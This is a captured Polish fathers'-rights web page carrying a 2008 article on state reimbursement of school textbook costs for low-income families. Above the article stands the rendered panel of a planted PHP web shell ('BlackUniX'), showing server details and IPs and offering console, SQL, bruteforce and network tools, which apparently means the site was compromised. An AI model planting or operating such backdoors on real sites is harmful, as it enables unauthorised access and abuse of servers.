W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:48:33
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Rząd zwraca pieniądze za wyprawkę szkolną
28.08.2008.
Zaczęło obowiązywać rozporządzenie Rady Ministrów określające zasady zwrotu kosztów zakupu podręczników na rok szkolny 2008/2009. Rządowy program pomocy (kontynuacja wcześniejszej "Wyprawki szkolnej") ma na celu wyrównywanie szans edukacyjnych przez przyznanie wsparcia finansowego uczniom z najuboższych rodzin. Skorzystają z niego ci, w których rodzinie miesięczny dochód na osobę nie przekracza 351 zł.
Program dotyczy uczniów objętych obowiązkiem rocznego przygotowania przedszkolnego (tzw. zerówek) oraz klas I – III szkół podstawowych i tych samych klas ogólnokształcących szkół muzycznych I stopnia. O zwrot kosztów można ubiegać się również, gdy dziecko jest uczniem szkoły niepublicznej.

Aby skorzystać z pomocy finansowej, należy złożyć wniosek do dyrektora szkoły, do której dziecko będzie chodziło. Pozornie krąg osób mogących taki wniosek złożyć jest bardzo szeroki. Należą do niego bowiem nie tylko rodzice (również zastępczy) lub inni prawni opiekunowie, ale także dyrektor, nauczyciele, pracownicy socjalni i inne osoby. Ogranicza ich jednak posiadanie zgody przedstawiciela ustawowego.

Do wniosku należy dołączyć zaświadczenie o wysokości dochodów, a jeżeli rodzina korzysta ze środków pomocy społecznej – również zaświadczenie o tym fakcie. Pieniądze zostaną zwrócone przez dyrektora szkoły po przedłożeniu dowodu zakupu – faktury, paragonu lub rachunku.

Ministerstwo Edukacji Narodowej informuje, że rodzice, którzy kupili podręczniki już wcześniej, mogą także otrzymać zwrot pieniędzy na podstawie oświadczenia.

Maksymalna wysokość pomocy finansowej zależy od klasy, do której dziecko będzie uczęszczało. Dla uczniów zerówek wynosi ona 70 zł, dla pierwszoklasistów – niezależnie od tego, czy chodzą do szkół podstawowych czy muzycznych – 130 zł. Uczniowie klas drugich i trzecich dostaną odpowiednio 150 i 170 zł.

Programem pomocy objęty jest tylko zakup podręczników, nie ma dofinansowania na inne materiały szkolne.

Termin składania wniosku określają wójtowie gmin, burmistrzowie i prezydenci miast. Wyjątkiem jest termin dla szkół muzycznych I stopnia – ten wyznacza minister kultury i dziedzictwa narodowego.

Rząd przewiduje, że programem zostanie objętych ok. 400 tys. uczniów. Na "Wyprawkę" z budżetu państwa przeznacza 50,3 mln zł.
Źródło: Michał Kuliński Rzeczpospolita
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.